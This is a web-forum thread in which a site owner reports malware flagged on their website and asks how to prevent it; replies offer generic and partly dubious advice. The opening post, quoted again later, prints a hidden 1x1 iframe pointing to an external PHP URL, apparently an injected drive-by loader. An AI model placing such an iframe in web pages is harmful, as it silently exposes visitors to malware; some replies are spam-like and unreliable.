14 {{ upvoteCount | shortNum }}
14 {{ upvoteCount | shortNum }}

Malware on my site

by esk
12 replies
Hey

today I've received an email from my sitelock service that they found malware on my site. Then I checked my site and found this code.

<iframe src="http://fs8g78f8dduf.com/puke.de/jnbnjoklioeoctgljvb.php" width="1" height="1" frameborder="0"></iframe>

Something like this happened already a few times to me.
What can i do to prevent this in the future?

Thanks for your help
#malware #site
  • Profile picture of the author kStarDacTeam
    Are your passwords strong enough ?
    You should ensure all passwords that enable write access to your website content (FTP, SSH, ...) are strong enough to not be brute forced.
    {{ DiscussionBoard.errors[3882931].message }}
  • Profile picture of the author jeffam
    What CMS are you using ?

    You have been hacked & you must update everything & change all your credentials.
    {{ DiscussionBoard.errors[3898208].message }}
  • Profile picture of the author DominicF
    If you are using a CMS do a quick google search to see if anyone else has had a similar problem with the same hack. You should also find some solutions to fix it.
    {{ DiscussionBoard.errors[3898851].message }}
  • Profile picture of the author verdaga
    In these kind of situations...only google is your friend. Try it.
    {{ DiscussionBoard.errors[3898908].message }}
  • Profile picture of the author samstephan9
    Google can help you in this problem.
    Signature
    Facebook App Developer | iPhone Application Development
    {{ DiscussionBoard.errors[3899096].message }}
    • Profile picture of the author steven300
      Google is the best plat form for this problem from google you can get any solution and solve your problem
      {{ DiscussionBoard.errors[3903475].message }}
  • Profile picture of the author andrejvasso
    if this has already happened a few times, my first guess is that you have been infected with a keylogger.

    Have you ever formated your computer inbetween the attacks on your site? If not, I highly suggest to format your PC and than change ALL passwords.

    Another solution, but unlikely, is that your CMS (wordpress?) is not up-to-date and some1 is constantly gaining access through a vulnerability.

    p.s. no one brute-forces cms logins...... (at least I dont think any1 does that anymore).....
    {{ DiscussionBoard.errors[3903515].message }}
    • Profile picture of the author awebforyou
      what database are you using

      this sounds like an sql injection hack

      if you tell me what your site is code in - I can give you some of my functions that clean strings for sql injection before submitting to a database
      {{ DiscussionBoard.errors[3906012].message }}
  • Profile picture of the author Logo Design
    You changed your hosting file server then Google will removed the Malware errors
    {{ DiscussionBoard.errors[4211123].message }}
  • Profile picture of the author Abhishek Kundu
    hello esk,
    i will advice you to change your hosting server. if the servers don't have proper firewall then these things do happen.
    you have not mentioned which cms you are using.

    TIPS
    1. if you are using any cms try to get the latest updates for it.
    2. try to use a better passwords for your control panel.
    3. it's also advisable to use a linux hosting for your website as it's more secure operating system.
    after you have removed the malware from your website don't forget to inform google. this can be done via google webmaster tool.
    Signature
    CLICK HERE>>> FOLLOW ME ON TWITTER <<
    {{ DiscussionBoard.errors[4239795].message }}
  • Profile picture of the author Tom Albas
    Originally Posted by esk View Post

    Hey

    today I've received an email from my sitelock service that they found malware on my site. Then I checked my site and found this code.

    <iframe src="http://fs8g78f8dduf.com/puke.de/jnbnjoklioeoctgljvb.php" width="1" height="1" frameborder="0"></iframe>

    Something like this happened already a few times to me.
    What can i do to prevent this in the future?

    Thanks for your help

    first find this code in your serve file.when you got this file,removed it then again go to your webmaster tool click on Review it
    Signature
    iPhone Game Development| Android Game Development | Facebook Game Development | Mobile Game Development
    {{ DiscussionBoard.errors[4490561].message }}
  • Profile picture of the author murrad
    Esk, I once had the same issue but I backup my site and removed the code manually and informed google and thats it and now the site is running good without issue.
    Signature

    Environment friendly Paper cup machine

    {{ DiscussionBoard.errors[4517098].message }}

Trending Topics